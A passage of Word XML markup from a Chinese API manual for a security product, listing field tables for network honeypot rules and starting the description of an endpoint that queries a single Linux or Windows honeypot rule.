            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="55048EE3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2AEA6B3D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>主机IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="42EEF12C" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4CB16758" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>connectionIp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4CD68897" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5D42D8BA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="68814989" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>连接IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="003CDD3D" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="63A70E1B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>externalIp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1AD51BF2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7C9DC93C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4C3DF716" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>外网IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="523D65B2" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3A002342" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>internalIp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="32557A5D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="14440C6B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="119D150E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>内网IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="729EB223" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="18732C91" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>bizGroupId</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1581746B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="225BFA20" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>bigint</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>20)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3D975B84" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>业务组ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="50456941" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4D24EB17" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>bizGroup</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1C5BAD4C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0413EB38" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0B337613" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>业务组名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="58AEC135" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="11E3BEDA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>remark</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="691D7BAC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2B1E6474" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4800905B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>备注</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="61ABC887" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4336F967" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>hostTagList</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2F0AB485" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="48BC0C76" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7136E2E8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>标签</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="655B18F3" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1638D2C4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>hostname</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1CFA5603" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4AC27C64" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>512)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="222AF739" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>主机名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="262A63BD" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="72D91AE9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>status</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0DEA476C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6FC2A790" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>tinyint</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>1)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="19A33B65" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>规则状态，0:规则启用 1:规则禁用</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="0E7E33A5" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="43411F87" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>verifyStatus</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="34635E07" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="631B002B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>tinyint</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>1)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1DE2525B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>同步状态，0:规则同步中 1:同步完毕</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="6BFF54FA" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1A8FF877" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>ports</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="203BB790" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2DFDC9FC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7C3A84A3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>规则端口</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3D6BED16" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Port数据结构：</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="788"/>
        <w:gridCol w:w="896"/>
        <w:gridCol w:w="1044"/>
        <w:gridCol w:w="5403"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="1713FC5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0733EFA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="104402CC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1C2BF6E5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>建议长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5DAB7E2A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="79977D85" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="74C41202" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>port</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="20F3BB5C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="416769CD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>int(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>8)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3752ABD9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>端口</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="3501176D" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="43B7416A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>status</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="68556123" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2E7C6F8E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>int(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>4)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="76D06D61" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>端口状态，含义如下：-1:同步行中 1:同步成功 0:同步失败</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="05EC8DBD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="339" w:name="_Toc115166242"/>
      <w:bookmarkStart w:id="340" w:name="查询单条规则-2"/>
      <w:bookmarkEnd w:id="338"/>
      <w:r>
        <w:t>查询单条规则</w:t>
      </w:r>
      <w:bookmarkEnd w:id="339"/>
    </w:p>
    <w:p w14:paraId="5F0636AB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>该接口提供Linux/Windows网络蜜罐单条规则的数据查询。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C6C2201" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B6138B6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>GET /external/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/detect/honeypot/{</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>linux,win</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>}/rule/{id}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BC9685F"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630"/>
        <w:gridCol w:w="777"/>
        <w:gridCol w:w="1044"/>
        <w:gridCol w:w="854"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="6567924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8B5DE94" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="442893FB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="63C1D135" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>是否必填</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1D83D3F8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="31E59BEB" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5163AF0B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="783F1F7F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="28A8378F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>是</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="58683C7E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>主机ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="509B60A9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73D80883" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
